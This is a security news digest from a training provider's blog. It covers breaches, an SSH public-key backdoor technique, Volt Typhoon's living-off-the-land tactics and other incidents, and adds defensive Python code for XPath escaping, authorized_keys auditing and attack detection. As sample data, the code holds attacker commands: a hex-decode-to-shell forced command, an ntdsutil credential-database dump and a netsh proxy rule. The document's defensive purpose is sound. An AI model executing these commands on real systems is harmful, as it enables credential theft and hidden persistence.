Both cases, however, highlight the need for a well-considered data breach policy and incident response plan which covers crisis communications and reputation repair. Failure to notify individuals seriously reduces public trust and confidence in the breached organizations - especially when a perceived cover-up makes the headlines. There is some evidence that full disclosure and transparency leads affected individuals to correctly attribute blame to cybercriminals and side - to a limited extent - with the affected organization, especially if it provides them with assistance and contacts to limit the damage.

Hislop, Jack, NT information commissioner seeks to distance himself from privacy breach of public health files, ABC News, 27 May 2023. Available online at https://www.abc.net.au/news/2023-05-27/nt-information-commissioner-privacy-breach-public-health-files/102397744.

Rizmal, Zalika, Fire Rescue Victoria's cyber-hack response a 'lesson in how not to communicate', ABC News, 27 May 2023. Available online at https://www.abc.net.au/news/2023-05-27/fire-rescue-victoria-data-hack-privacy/102400672.

Benoit, William L., Image Repair Discourse and Crisis Communication, Public Relations Review 23, no. 2 (June 1997): 177-86.

Rikki Don't Lose That Phone

We all know that improper media sanitization before disposal leads to second-hand devices being sold with data intact and recoverable by the new owners. And, of course, if your device is stolen, there goes the opportunity to delete data and do a factory reset - so that devices bought from pawn shops and online trading sites have an even higher proportion of personal data on them.

But if you really want to cheaply acquire a lot of sensitive information, here's a source you may not have thought of: buying cellphones which are auctioned off by US police departments. It makes sense: phones which police have seized will often contain evidence of criminal activity - and in some cases, the police may have helpfully used forensic tools to provide privileged levels of access to information which would normally be protected, passing this information on to the new owner. If you're a drug dealer looking for new customers, your local police department could be a useful source of contacts!

Richard Roberts and his colleagues at the University of Maryland bought 228 police-auctioned cellphones at an average price of just $US18.00. Of these, 49 were completely unlocked and others used easily-guessable passcodes. In one case, police had used GrayKey mobile device forensics software to break into the phone, and had noted the passcode.

Several phones had stored credit card details - some legitimate and some stolen. The researchers also found scans of 5 passports and 14 driver's licences, as well as a few scans of government-issued identity credentials and some communication between sex workers and clients. As one might expect, there were also personal text messages, not to mention nude photographs.

With one phone, the researchers struck the motherlode: 24 credit reports, along with the related identity, bank account details, social security numbers and employment records - probably the work materials of an identity fraudster.

The fact that police forces do not destroy these devices or at least sanitize them is surprising, to say the least. It also highlights the importance of securing portable devices as well as the use of mobile device management software to remotely delete sensitive data when the device is lost or stolen - although subsequent use of forensic tools may defeat even that.

Roberts, Richard, Julio Poveda, Raley Roberts and Dave Levin, Blue Is the New Black (Market): Privacy Leaks and Re-Victimization from Police-Auctioned Cellphones, preprint, IEEE Security & Privacy 2023. Available online at http://richard.technology/research/publications/ieeesp23_auctions.pdf.

Researchers Close Google CloudSQL Hole

Cloud applications often require a separate persistent data store, and so the cloud service providers typically offer both a NoSQL cloud-native database and a choice of the more popular SQL relational database engines, such as MySQL and Microsoft SQL Server. One problem service providers face is adapting and especially securing these databases for the cloud environment - they were originally developed for stand-alone operating system platforms. In the case of the open-source products like MySQL and PostgreSQL, the availability of the source code helps, but SQL Server is proprietary, and so cloud security needs to be added 'on top' rather than tightly integrated.

Understanding this led researchers at Dig Security to discover a rather nasty vulnerability in Google's CloudSQL implementation of SQL Server. The vulnerability allowed privilege escalation from a basic CloudSQL user to a full-fledged administrator on the SQL Server container. This was achieved in two steps: first, escalating from CustomerDbRootRole to DbRootRole, which is a Google Cloud Platform admin role, followed by exploitation of a misconfiguration which allowed a further escalation to the Sysadmin role.

This would grant full access to all data in the SQL server, as well as full access to the underlying operating system - not to mention access to service agents and some URLs which could allow pivoting to other environments.

Fortunately, the researchers collaborated with Google to resolve the underlying issues, presumably earning a nice bug bounty in the process.

Balassiano, Ofir and Ofir Shaty, GCP CloudSQL Vulnerability Leads to Internal Container Access and Data Exposure, blog post, 24 May 2023. Available online at https://www.dig.security/post/gcp-cloudsql-vulnerability-leads-to-internal-container-access-and-data-exposure.


[ Modified: Monday, May 29, 2023, 12:18 PM ]
by Les Bell - Friday, May 26, 2023, 11:30 AM


News Stories


With an eye to the approaching weekend, some lighter reading in today's news brief:

Botnet Madness for Teens

From Scott J. Shapiro's new book, "Fancy Bear Goes Phishing", by way of IEEE Spectrum magazine, comes the fascinating tale of how an arms race between two sparring groups of teenagers, combined with an informal protection racket against Rutgers University, led to the creation of the Mirai botnet.

Shapiro, Scott J., The Strange Story of the Teens Behind the Mirai Botnet, IEEE Spectrum, 23 May 2023. Available online at https://spectrum.ieee.org/mirai-botnet.

Defending Against XPath Injection

One of the short topics I cover during our CISSP courses is the variety of injection attacks, with examples of both SQL injection and XML injection; there isn't time to go into the other types such as LDAP injection and command injection. One that I don't mention at all is XPath injection.

Trend Micro comes to the rescue here, with a nice, short but reasonably comprehensive tutorial on the topic. XPath - the XML Path Language - is used to query XML databases and it can be used by attackers in a manner similar to the more common SQL injection, retrieving information from the XML Document Object Model. In particular, with repeated queries, an attacker can 'crawl' the DOM, gradually recreating the entire XML document.

The Trend Micro tutorial walks the user through creating a simple Node.js application which queries an XML database, and then demonstrates some XPath injections. It then concludes with the defensive techniques, which are in some ways analogous to the SQL injection defenses: input sanitization, using parameterized XPath queries and using precompiled XPath queries.
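As an added illustration (not code from the Trend Micro tutorial, which is written in Node.js), here is the query-building half of the defence in Python: the vulnerable string concatenation beside a literal builder that embeds user input as an opaque XPath 1.0 string. The `//user[name=...]` query shape is an assumption; the point is the concat() split, needed because XPath 1.0 has no escape sequence for quotes inside a literal.

```python
"""Vulnerable XPath query construction beside a safe literal builder.
Added illustration; the //user[name=...] query shape is assumed."""


def vulnerable_query(username: str) -> str:
    """The classic bug: user input pasted straight into the predicate."""
    return f"//user[name='{username}']"


def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 string literal that evaluates exactly to `value`.

    XPath 1.0 cannot escape a quote inside a literal, so choose a quoting
    style the value does not contain; when it contains both kinds, split on
    the single quotes and glue the pieces back with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append('"\'"')  # the single quote itself, double-quoted
    return "concat(" + ", ".join(pieces) + ")"


def safe_query(username: str) -> str:
    """Same query, but the value can no longer close the predicate."""
    return f"//user[name={xpath_literal(username)}]"
```

A real parameterised or precompiled XPath API does this quoting for you; the builder is what you fall back on when the library only accepts a query string.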

Trend Micro DevOps Resource Center, Understanding XPath Injection Vulnerabilities, web page, 25 May 2023. Available online at https://www.trendmicro.com/en_us/devops/23/e/xpath-injection-vulnerabilities.html.

Exploiting SSH Public Keys for Fun and Profit

Finally, from The Hacker's Choice comes an interesting technique which exploits a little-known feature of OpenSSH in order to create a persistent backdoor on compromised systems.

OpenSSH public keys can be prefixed by various options - I bet you didn't know that, despite having read the Snail book, right? - and one of these options allows execution of a command. In the article, the author executes PowerShell to evaluate some commands, which are obscured by their conversion into a long hexdump string; the string is piped into the xxd hex dump utility to convert them back to text before evaluation.

The backdoor in this example is an installer, fetched from thc.org and then executed in memory before the user's normal shell is started.

It's a neat trick; SSH public keys are long base64-encoded strings anyway, and so at a casual glance, a long hex string will not draw attention. Generally, we can rely on a simple defence - the permission bits on ~/.ssh and the authorized_keys file within it, which will stop any other users having access to them, let alone editing a key:

drwx------. 2 username username   48 Feb 26 14:11 .
-rw-------. 1 username username  102 Jun 11  2022 authorized_keys

However, cloud instances often have keys loaded into them at boot time, and if an attacker was able to edit a root account or service key in, for example, a cloud management console . . .
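An added example, not from the THC post: a small Python auditor that parses authorized_keys entries (format per sshd(8)) and reports any entry carrying an option that runs code, flagging forced commands that look obscured by a long hex string or a decoder such as xxd. The sample lines are constructed and the key material is placeholder text.

```python
"""Audit OpenSSH authorized_keys entries for option prefixes such as
command="...".  Added illustration, not code from the THC article; the
sample entries below are constructed.  Format per sshd(8): optional
comma-separated options (quoted values may hold spaces and commas), then
key type, base64 key and an optional comment."""
import re

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com")
# Options that run code or alter the session: always worth a second look.
EXECUTING_OPTIONS = {"command", "environment"}
# A long hex run or a decoder in a forced command suggests an obscured payload.
OBSCURED_RE = re.compile(r"[0-9a-f]{32,}|\bxxd\b|\bbase64\b", re.IGNORECASE)


def split_options(options: str) -> dict:
    """Parse 'a,b="x, y",c=d' into {'a': None, 'b': 'x, y', 'c': 'd'}."""
    result, name, value, in_quotes = {}, "", None, False
    for ch in options:
        if in_quotes:
            if ch == '"':
                in_quotes = False
            else:
                value += ch
        elif ch == '"':
            in_quotes, value = True, (value or "")
        elif ch == ",":
            result[name.lower()] = value
            name, value = "", None
        elif ch == "=" and value is None:
            value = ""
        elif value is None:
            name += ch
        else:
            value += ch
    if name:
        result[name.lower()] = value
    return result


def parse_line(line: str):
    """Return {'options', 'type', 'key', 'comment'} or None for non-entries."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    options, rest = "", line
    if line.split(None, 1)[0] not in KEY_TYPES:
        in_quotes = False  # options run up to the first unquoted space
        for i, ch in enumerate(line):
            if ch == '"':
                in_quotes = not in_quotes
            elif ch.isspace() and not in_quotes:
                options, rest = line[:i], line[i + 1:].lstrip()
                break
        else:
            return None
    fields = rest.split(None, 2)
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        return None
    return {"options": split_options(options), "type": fields[0],
            "key": fields[1], "comment": fields[2] if len(fields) > 2 else ""}


def audit_lines(lines) -> list:
    """[(line_no, comment, finding), ...] for entries with risky options."""
    report = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue
        for name, value in entry["options"].items():
            if name in EXECUTING_OPTIONS:
                report.append((n, entry["comment"], f"{name}= option: {value!r}"))
                if value and OBSCURED_RE.search(value):
                    report.append((n, entry["comment"], "value looks obscured"))
    return report


SAMPLE = [  # constructed entries; key material is placeholder text
    "# constructed authorized_keys",
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyData alice@laptop",
    'from="10.0.0.0/8",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholder bob@ops',
    'command="echo deadbeefdeadbeefdeadbeefdeadbeef | xxd -r -p | sh",no-pty '
    "ssh-rsa AAAAB3NzaC1yc2EPlaceholder deploy",
]
```

Run it over every user's authorized_keys (and, on cloud instances, over whatever the boot-time key injection writes) alongside the permission check on ~/.ssh; a forced command on a service or root key deserves a change ticket behind it.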

Something to think about over the weekend.

root, Infecting SSH Public Keys with backdoors, blog post, 24 May 2023. Available online at https://blog.thc.org/infecting-ssh-public-keys-with-backdoors.


by Les Bell - Thursday, May 25, 2023, 10:21 AM


News Stories


Chinese State-Sponsored Threat Actor Targets US Pacific Infrastructure

New reports from Microsoft and the NSA detail the activities of a stealthy cyber-espionage campaign against US critical infrastructure in the US and Pacific, particularly Guam. The threat actor involved, named Volt Typhoon, is a Chinese state-sponsored APT which has operated since mid-2021, and this campaign spans the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors with the likely long-term goal of disrupting critical communications infrastructure between the US and the Western Pacific rim in the event of any future crisis.

Volt Typhoon works hard to evade detection; once they have gained initial access - usually by compromising Fortinet FortiGuard devices - they leverage any privileges gained via the FortiGuard device, extract credentials for an Active Directory account used by the device and then pivot to other devices on the network, using these credentials. They also proxy all traffic to their targets through compromised SOHO routers, including those from ASUS, Cisco, D-Link, NetGear and Zyxel (these devices often have their admin interfaces exposed to the Internet - a very dangerous practice).

Having gained access, the Volt Typhoon operators exploit the target environment via the command line, typically using LOLbins and standard operating system commands such as wmic.exe and netsh.exe as well as PowerShell. For example, the command

cmd.exe /c wmic path win32_logicaldisk get caption, filesystem,freespace,size,volumename

will return information about all local and network mounted drives on the system, including drive letter, format, free space, size (network drives shared from the same server usually show the same free space and size - a useful clue) and volume label. Since WMI tracing is disabled by default, this will escape detection, and by not introducing any backdoors or other malware, and by using existing accounts, the intruders will evade detection by EDR tools.

Typically, they will attempt to dump credentials from the LSASS (Local Security Authority Subsystem Service) for subsequent exfiltration, and to use the Ntdsutil.exe command to create installation media for new domain controllers, as the files in these contain usernames and password hashes which they can crack offline by means of dictionary or rainbow table attacks. In a few cases, the Volt Typhoon operators will create a proxy on a compromised system by using the netsh portproxy command (another LOLbin) and very rarely they will use custom versions of the open-source Impacket and FRP (Fast Reverse Proxy) tools to establish a C2 channel.
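An added example (not code from the Microsoft or NSA reports): detection rules for the commands described above, run over constructed process events in a Sysmon-like field layout (CommandLine, SourceImage, TargetImage), with a per-host roll-up, because when nothing is dropped and existing accounts are reused, the signal is several of these techniques clustering on one host. The ATT&CK technique mapping and the lsass allow-list are my own and are illustrative.

```python
"""Detection rules for living-off-the-land commands, run over constructed
process events.  Added illustration, not code from the Microsoft or NSA
reports.  Field names follow the Sysmon layout (CommandLine, SourceImage,
TargetImage); the ATT&CK mapping and allow-list are illustrative."""
import re
from collections import defaultdict

# Illustrative processes that legitimately open lsass.exe; tune per estate.
LSASS_ALLOW = ("\\msmpeng.exe", "\\csrss.exe", "\\wininit.exe", "\\svchost.exe")

# (rule name, ATT&CK technique, pattern over the normalised command line)
RULES = [
    ("wmic logical-disk enumeration", "T1047",
     re.compile(r"\bwmic\b.*logicaldisk")),
    ("netsh portproxy rule added", "T1090.001",
     re.compile(r"\bnetsh\b.*\bportproxy\b.*\badd\b")),
    ("ntdsutil IFM media creation", "T1003.003",
     re.compile(r"\bntdsutil\b.*\bifm\b")),
]


def normalise(cmd: str) -> str:
    """Lower-case and collapse whitespace so spacing tricks do not evade rules."""
    return re.sub(r"\s+", " ", cmd).strip().lower()


def evaluate(event: dict) -> list:
    """Return [(rule_name, technique), ...] triggered by a single event."""
    hits = []
    if event.get("EventType") == "ProcessCreate":
        cmd = normalise(event.get("CommandLine", ""))
        hits = [(name, tech) for name, tech, rx in RULES if rx.search(cmd)]
    elif event.get("EventType") == "ProcessAccess":
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower()
        if target.endswith("\\lsass.exe") and not source.endswith(LSASS_ALLOW):
            hits.append(("lsass.exe opened by unexpected process", "T1003.001"))
    return hits


def scan(events: list) -> list:
    """[(event_index, host, hits), ...] for events that triggered a rule."""
    out = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((i, ev.get("Host", "?"), hits))
    return out


def hosts_to_escalate(events: list, min_techniques: int = 2) -> dict:
    """Hosts showing several distinct techniques.  With no malware dropped and
    existing accounts reused, this clustering is the signal worth paging on."""
    seen = defaultdict(set)
    for _, host, hits in scan(events):
        seen[host].update(tech for _, tech in hits)
    return {h: sorted(t) for h, t in seen.items() if len(t) >= min_techniques}


SAMPLE_EVENTS = [  # constructed; hosts and paths are placeholders
    {"EventType": "ProcessCreate", "Host": "WKS01",
     "CommandLine": "cmd.exe /c wmic path win32_logicaldisk get caption, "
                    "filesystem,freespace,size,volumename"},
    {"EventType": "ProcessCreate", "Host": "WKS01",
     "CommandLine": "wmic os get caption"},  # routine inventory, no hit
    {"EventType": "ProcessCreate", "Host": "DC01",
     "CommandLine": 'ntdsutil "ac i ntds" ifm "create full C:\\Temp\\ifm" q q'},
    {"EventType": "ProcessAccess", "Host": "DC01",
     "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe"},  # allow-listed
    {"EventType": "ProcessAccess", "Host": "DC01",
     "SourceImage": "C:\\Users\\Public\\proc.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe"},
    {"EventType": "ProcessCreate", "Host": "SRV02",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=8443 "
                    "connectaddress=10.0.0.5 connectport=443"},
]

if __name__ == "__main__":
    for index, host, hits in scan(SAMPLE_EVENTS):
        print(index, host, hits)
    print(hosts_to_escalate(SAMPLE_EVENTS))
```

Since WMI tracing is off by default, the ProcessCreate rules depend on command-line auditing (Sysmon Event 1 or 4688 with command-line logging) actually being enabled on the endpoints.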

The Microsoft report provides some guidance for mitigation and protection, including IOCs, while the associated NSA Joint Cybersecurity Advisory provides more detailed analysis and guidance.

Microsoft Threat Intelligence, Volt Typhoon targets US critical infrastructure with living-off-the-land techniques, blog post, 24 May 2023. Available online at https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/.

NSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, Joint Cybersecurity Advisory, May 2023. Available online at https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF.

XSS Campaign Targets WordPress Sites

Researchers at Wordfence, a vendor of a specialised web application firewall for WordPress, have revealed a large-scale attack exploiting Beautiful Cookie Consent Banner, a WordPress plugin which is installed on over 40,000 sites. This plugin is vulnerable to a Stored Cross-Site Scripting (XSS) exploit via the nsc_bar_content_href parameter in versions up to and including version 2.10.1 due to insufficient input sanitization and output escaping. This allows an unauthenticated attacker to inject arbitrary scripts into pages, which will then execute whenever a user accesses those pages. The vulnerability merits a CVSS score of 7.2 (high).

A partial patch was introduced in version 2.10.1 of the plugin, and the vulnerability was finally remediated in version 2.10.2 back in January. Wordfence recommends updating to the latest version, 2.13.0, as soon as possible (systems protected by their Wordfence firewall were always protected).

Wordfence's researchers suspect this campaign, which has run since early February, is being conducted by a single threat actor, as every attack contained the same payload - which in fact, failed to work. However, now that the vulnerability is being publicized, it seems likely a competent threat actor will adopt it, making reactive patching particularly important.

Gall, Ram, Wordfence Firewall Blocks Bizarre Large-Scale XSS Campaign, blog post, 24 May 2023. Available online at https://www.wordfence.com/blog/2023/05/wordfence-firewall-blocks-bizarre-large-scale-xss-campaign/.

Security Analyst Jailed for MitM Escalation

Finally, an enjoyable read for your coffee break, with the sad tale of a Security Analyst at a company which had fallen victim to a ransomware attack. Rather than working diligently on behalf of his employer to fend off the attack, the insider decided to turn the situation even further to his advantage, by substituting his own Bitcoin wallet addresses for those in the attackers' ransom demands, and additionally spoofing emails to increase the pressure to pay up.

Unfortunately, his man-in-the-middle exploit was foiled when his employer decided not to pay up - and even worse, his email interference showed up in system logs, leading to his arrest. Although it took 5 years for his case to finally come to court, he decided last week to plead guilty - presumably in hopes of a reduced sentence - and will return to Reading Crown Court for sentencing on 11 July.

South East Regional Organised Crime Unit, Man convicted of blackmail and other offences, press release, 22 May 2023. Available online at https://serocu.police.uk/man-convicted-of-blackmail-and-other-offences/.


by Les Bell - Wednesday, May 24, 2023, 9:19 AM


News Stories


Kimsuky is Back With New Phishing Campaign

North Korean cyber-espionage APT Kimsuky is running a campaign targeting organizations that show an interest in the DPRK, including human rights activists, defector support organizations and information services, according to researchers at SentinelOne. Kimsuky has been active since at least 2012, engaging in spearphishing and social engineering campaigns to collect intelligence and access sensitive information in order to further the interests of the North Korean government.

In the new campaign, Kimsuky has shifted to using a variant of the RandomQuery malware; although RandomQuery has a range of capabilities including keylogging and dropping additional malware, this variant is used only to perform file enumeration and information exfiltration.

The malware is distributed using Microsoft Compiled HTML Help (CHM) files, which has long been Kimsuky's favourite technique. The group is also using a wider range of TLDs for their C2 infrastructure, including .space, .asia, .click and .online, although they also continue to use legitimate-looking names in the .com domain.

The Sentinel Labs report provides a full analysis of this RandomQuery variant, along with IOCs and a list of malicious domains.

Milenkoski, Aleksandar and Tom Hegel, Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit, technical report, 23 May 2023. Available online at https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/.

CISA Updates Ransomware Guidance

The US Cybersecurity & Infrastructure Security Agency, FBI, NSA and Multi-State Information Sharing and Analysis Center (MS-ISAC) have updated their #StopRansomware Guide in light of the accelerated tactics and techniques employed by ransomware groups since the initial release of the Guide in 2020. The update incorporates lessons learned from the past two years and includes additional recommended actions, resources, and tools to maximize its relevancy and effectiveness and to further help reduce the prevalence and impacts of ransomware.

The new Guide was developed through the Joint Ransomware Task Force, which was established by the US Congress in 2022 and is co-chaired by CISA and the FBI.

The Guide is available at https://www.cisa.gov/resources-tools/resources/stopransomware-guide.

Cybersecurity & Infrastructure Security Agency, CISA and Partners Update the #StopRansomware Guide, Developed through the Joint Ransomware Task Force (JRTF), alert, 23 May 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/05/23/cisa-and-partners-update-stopransomware-guide-developed-through-joint-ransomware-task-force-jrtf.

Windows Adds Support for .rar, .tar, .gz (Groan)

Buried among a list of innovations being added to Windows - such as Windows Copilot (an AI assistant) and a raft of other AI-powered extensions - is the announcement that the Redmondites are adding native support for additional archive formats, including tar, 7-zip, rar, gz and many others using the libarchive open-source project.

Oh, great. Windows' graphical shell already supports automatic opening and extraction of .zip and .iso formats, and while this is convenient, it has also been seized upon as a way for malware operators to get their product installed onto the systems of unsuspecting victims. Windows normally tags email attachments with the Mark of the Web, to mark them as unsafe and discourage victims from unsafe practices like enabling macros in these files.

However, Windows does not similarly tag the files inside these archive formats, allowing them to sneak past this defensive line. Now the bad guys will have a whole new set of archive filetypes, many of which will be unfamiliar to the unsuspecting victims.

Sigh. As for the privacy and security dangers of AI in the OS - well, that ship has sailed and pointing out the problems is like peeing into the wind.

Panay, Panos, Bringing the power of AI to Windows 11 – unlocking a new era of productivity for customers and developers with Windows Copilot and Dev Home, blog post, 23 May 2023. Available online at https://blogs.windows.com/windowsdeveloper/2023/05/23/bringing-the-power-of-ai-to-windows-11-unlocking-a-new-era-of-productivity-for-customers-and-developers-with-windows-copilot-and-dev-home/.


[ Modified: Wednesday, May 24, 2023, 9:20 AM ]